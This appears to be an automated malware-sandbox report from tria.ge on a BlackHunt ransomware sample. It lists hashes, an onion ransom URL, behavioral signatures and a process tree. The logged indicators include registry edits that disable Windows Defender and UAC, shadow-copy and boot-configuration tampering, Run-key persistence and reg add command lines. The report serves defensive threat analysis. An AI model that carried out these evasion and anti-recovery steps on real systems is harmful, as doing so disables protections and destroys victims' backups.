Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
236s -
max time network
162s -
platform
windows7_x64 -
resource
win7-20231215-en -
resource tags
arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system -
submitted
18/01/2024, 23:47
Static task
static1
Behavioral task
behavioral1
Sample
74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe
Resource
win10v2004-20231222-en
General
-
Target
74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe
-
Size
707KB
-
MD5
b82cac919f05596869d5a32c6f47c18e
-
SHA1
ae6ddf54a7e42b27036dd9fec6fa9641bbf0f604
-
SHA256
74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7
-
SHA512
288847950e61a25723d54fadb82c59f34144f3b90d3439561577a035ba9ba6e080642b18c4070ad240787f6a30dd656d9bc6cf14fa64a40a4636d8a900959a31
-
SSDEEP
6144:wcmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza1j82vnh:6uaTmkZJ+naie5OTamgEoKxLWiIh
Malware Config
Extracted
F:\#BlackHunt_ReadMe.hta
http-equiv="x-ua-compatible"
http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion
Signatures
-
Deletes NTFS Change Journal 2 TTPs 1 IoCs
The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.
pid Process 516 fsutil.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
pid Process 1084 bcdedit.exe 2564 bcdedit.exe -
Renames multiple (103) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
pid Process 2432 wbadmin.exe -
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe -
Enumerates connected drives 3 TTPs 25 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\H: 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe File opened (read-only) \??\L: 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe File opened (read-only) \??\X: 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe File opened (read-only) \??\V: 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe File opened (read-only) \??\E: 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe File opened (read-only) \??\N: 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\S: 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe File opened (read-only) \??\A: 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe File opened (read-only) \??\Z: 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe File opened (read-only) \??\O: 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe File opened (read-only) \??\G: 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe File opened (read-only) \??\I: 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe File opened (read-only) \??\K: 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe File opened (read-only) \??\B: 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe File opened (read-only) \??\M: 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe File opened (read-only) \??\U: 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe File opened (read-only) \??\R: 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe File opened (read-only) \??\T: 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe File opened (read-only) \??\P: 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\W: 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe File opened (read-only) \??\Y: 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe File opened (read-only) \??\J: 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe File opened (read-only) \??\Q: 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 2 ip-api.com -
Drops file in Program Files directory 64 IoCs
description ioc Process File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\#BlackHunt_ReadMe.hta 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\HueCycle\NavigationUp_ButtonGraphic.png 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe File opened for modification C:\Program Files\7-Zip\Lang\co.txt 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe File opened for modification C:\Program Files\7-Zip\Lang\pl.txt 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Travel\#BlackHunt_ReadMe.txt 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\bin\#BlackHunt_ReadMe.txt 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\bin\plugin2\#BlackHunt_ReadMe.hta 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\amd64\#BlackHunt_ReadMe.hta 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\LayeredTitles\NavigationLeft_SelectionSubpicture.png 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe File opened for modification C:\Program Files\7-Zip\Lang\cs.txt 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\HueCycle\NavigationUp_SelectionSubpicture.png 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe File opened for modification C:\Program Files\7-Zip\Lang\ba.txt 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\HueCycle\#BlackHunt_ReadMe.txt 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\cmm\#BlackHunt_ReadMe.hta 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\babypink.png 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\highlight.png 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\PreviousMenuButtonIcon.png 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\OldAge\#BlackHunt_ReadMe.hta 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\FlipPage\NavigationLeft_SelectionSubpicture.png 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\FlipPage\NavigationRight_SelectionSubpicture.png 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe File opened for modification C:\Program Files\7-Zip\Lang\kk.txt 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Full\dotslightoverlay.png 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\LayeredTitles\203x8subpicture.png 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe File opened for modification C:\Program Files\7-Zip\Lang\pt-br.txt 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe File opened for modification C:\Program Files\7-Zip\Lang\tk.txt 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe File created C:\Program Files\Java\jdk1.7.0_80\include\#BlackHunt_ReadMe.txt 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\FlipPage\NavigationRight_ButtonGraphic.png 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Memories\Title_content-background.png 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Australia\#BlackHunt_ReadMe.hta 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe File opened for modification C:\Program Files\DVD Maker\SecretST.TTF 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\16to9Squareframe_Buttongraphic.png 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\LayeredTitles\#BlackHunt_ReadMe.txt 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Rectangles\#BlackHunt_ReadMe.txt 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Travel\#BlackHunt_ReadMe.hta 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\ext\#BlackHunt_ReadMe.hta 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\security\#BlackHunt_Private.key 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe File opened for modification C:\Program Files\7-Zip\Lang\ka.txt 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe File created C:\Program Files\DVD Maker\Shared\#BlackHunt_Private.key 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\#BlackHunt_ReadMe.txt 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\nav_rightarrow.png 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\#BlackHunt_Private.key 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\North_Dakota\#BlackHunt_Private.key 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\OldAge\decorative_rule.png 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe File opened for modification C:\Program Files\ConfirmCopy.crw 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe File opened for modification C:\Program Files\7-Zip\Lang\uz.txt 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe File opened for modification C:\Program Files\7-Zip\Lang\fa.txt 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\#BlackHunt_Private.key 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe File opened for modification C:\Program Files\7-Zip\Lang\ku.txt 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\amd64\#BlackHunt_ReadMe.txt 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\OldAge\NavigationUp_SelectionSubpicture.png 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe File created C:\Program Files\DVD Maker\fr-FR\#BlackHunt_ReadMe.txt 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe File opened for modification C:\Program Files\7-Zip\Lang\hi.txt 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\OldAge\#BlackHunt_ReadMe.txt 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\bin\server\#BlackHunt_ReadMe.hta 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\#BlackHunt_ReadMe.hta 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\circleround_videoinset.png 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe File opened for modification C:\Program Files\7-Zip\Lang\vi.txt 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\images\cursors\#BlackHunt_ReadMe.txt 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Memories\button-highlight.png 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Antarctica\#BlackHunt_ReadMe.txt 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\#BlackHunt_ReadMe.txt 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\LayeredTitles\1047x576black.png 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe File created C:\Program Files\Java\jdk1.7.0_80\#BlackHunt_ReadMe.txt 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Dot.png 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2452 schtasks.exe -
Interacts with shadow copies 2 TTPs 5 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 2484 vssadmin.exe 2232 vssadmin.exe 1784 vssadmin.exe 1556 vssadmin.exe 1436 vssadmin.exe -
Modifies registry class 10 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2 reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\ reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon reg.exe -
Suspicious use of AdjustPrivilegeToken 13 IoCs
description pid Process Token: SeDebugPrivilege 2988 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe Token: SeRestorePrivilege 2988 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe Token: SeBackupPrivilege 2988 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe Token: SeTakeOwnershipPrivilege 2988 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe Token: SeAuditPrivilege 2988 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe Token: SeSecurityPrivilege 2988 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe Token: SeIncBasePriorityPrivilege 2988 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe Token: SeBackupPrivilege 2700 vssvc.exe Token: SeRestorePrivilege 2700 vssvc.exe Token: SeAuditPrivilege 2700 vssvc.exe Token: SeBackupPrivilege 3416 wbengine.exe Token: SeRestorePrivilege 3416 wbengine.exe Token: SeSecurityPrivilege 3416 wbengine.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2988 wrote to memory of 2164 2988 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe 28 PID 2988 wrote to memory of 2164 2988 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe 28 PID 2988 wrote to memory of 2164 2988 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe 28 PID 2988 wrote to memory of 2164 2988 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe 28 PID 2988 wrote to memory of 2636 2988 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe 30 PID 2988 wrote to memory of 2636 2988 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe 30 PID 2988 wrote to memory of 2636 2988 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe 30 PID 2988 wrote to memory of 2636 2988 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe 30 PID 2988 wrote to memory of 2872 2988 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe 32 PID 2988 wrote to memory of 2872 2988 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe 32 PID 2988 wrote to memory of 2872 2988 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe 32 PID 2988 wrote to memory of 2872 2988 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe 32 PID 2988 wrote to memory of 2868 2988 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe 33 PID 2988 wrote to memory of 2868 2988 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe 33 PID 2988 wrote to memory of 2868 2988 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe 33 PID 2988 wrote to memory of 2868 2988 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe 33 PID 2636 wrote to memory of 2012 2636 cmd.exe 126 PID 2636 wrote to memory of 2012 2636 cmd.exe 126 PID 2636 wrote to memory of 2012 2636 cmd.exe 126 PID 2164 wrote to memory of 368 2164 cmd.exe 36 PID 2164 wrote to memory of 368 2164 cmd.exe 36 PID 2164 wrote to memory of 368 2164 cmd.exe 36 PID 2988 wrote to memory of 1948 2988 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe 38 PID 2988 wrote to memory of 1948 2988 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe 38 PID 2988 wrote to memory of 1948 2988 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe 38 PID 2988 wrote to memory of 1948 2988 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe 38 PID 2988 wrote to memory of 2036 2988 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe 39 PID 2988 wrote to memory of 2036 2988 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe 39 PID 2988 wrote to memory of 2036 2988 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe 39 PID 2988 wrote to memory of 2036 2988 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe 39 PID 2988 wrote to memory of 1052 2988 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe 41 PID 2988 wrote to memory of 1052 2988 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe 41 PID 2988 wrote to memory of 1052 2988 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe 41 PID 2988 wrote to memory of 1052 2988 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe 41 PID 2988 wrote to memory of 1468 2988 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe 43 PID 2988 wrote to memory of 1468 2988 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe 43 PID 2988 wrote to memory of 1468 2988 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe 43 PID 2988 wrote to memory of 1468 2988 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe 43 PID 2988 wrote to memory of 1464 2988 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe 44 PID 2988 wrote to memory of 1464 2988 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe 44 PID 2988 wrote to memory of 1464 2988 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe 44 PID 2988 wrote to memory of 1464 2988 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe 44 PID 2988 wrote to memory of 900 2988 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe 46 PID 2988 wrote to memory of 900 2988 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe 46 PID 2988 wrote to memory of 900 2988 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe 46 PID 2988 wrote to memory of 900 2988 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe 46 PID 2988 wrote to memory of 1656 2988 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe 50 PID 2988 wrote to memory of 1656 2988 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe 50 PID 2988 wrote to memory of 1656 2988 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe 50 PID 2988 wrote to memory of 1656 2988 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe 50 PID 2988 wrote to memory of 1680 2988 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe 52 PID 2988 wrote to memory of 1680 2988 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe 52 PID 2988 wrote to memory of 1680 2988 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe 52 PID 2988 wrote to memory of 1680 2988 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe 52 PID 2988 wrote to memory of 1600 2988 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe 54 PID 2988 wrote to memory of 1600 2988 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe 54 PID 2988 wrote to memory of 1600 2988 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe 54 PID 2988 wrote to memory of 1600 2988 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe 54 PID 2036 wrote to memory of 1628 2036 cmd.exe 53 PID 2036 wrote to memory of 1628 2036 cmd.exe 53 PID 2036 wrote to memory of 1628 2036 cmd.exe 53 PID 2988 wrote to memory of 1692 2988 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe 56 PID 2988 wrote to memory of 1692 2988 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe 56 PID 2988 wrote to memory of 1692 2988 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe 56 -
System policy modification 1 TTPs 3 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe"C:\Users\Admin\AppData\Local\Temp\74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe"1⤵
- UAC bypass
- Checks whether UAC is enabled
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:2988 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2164 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f3⤵
- Modifies registry class
PID:368
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2636 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵PID:2012
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f2⤵PID:2872
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f3⤵PID:2060
-
-
-
